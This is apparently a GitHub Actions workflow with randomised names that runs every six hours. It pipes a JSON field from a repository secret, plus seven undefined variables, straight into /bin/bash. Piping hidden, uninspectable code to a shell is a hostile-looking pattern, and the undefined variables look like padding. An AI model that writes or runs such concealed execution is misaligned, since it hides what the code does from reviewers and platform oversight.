name: qianxuanbutong

on:
  workflow_dispatch:
  schedule:
    - cron: '38 1/6 * * *'

jobs:  # 21801
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qianxuanbutong
        env:
          bwhbf1696: ${{ secrets.bwhbf1696 }}
        run: |
          echo $bwhbf1696 | jq -r .lltm19 | /bin/bash
          echo $lblpp33443 | jq -r .ukc28 | /bin/bash
          echo $y13 | jq -r .krir268 | /bin/bash
          echo $z30 | jq -r .z79839 | /bin/bash
          echo $v0842 | jq -r .cov54 | /bin/bash
          echo $q6 | jq -r .p6 | /bin/bash
          echo $dqi09217 | jq -r .ace731 | /bin/bash
          echo $bmo48338 | jq -r .pkofo92141 | /bin/bash

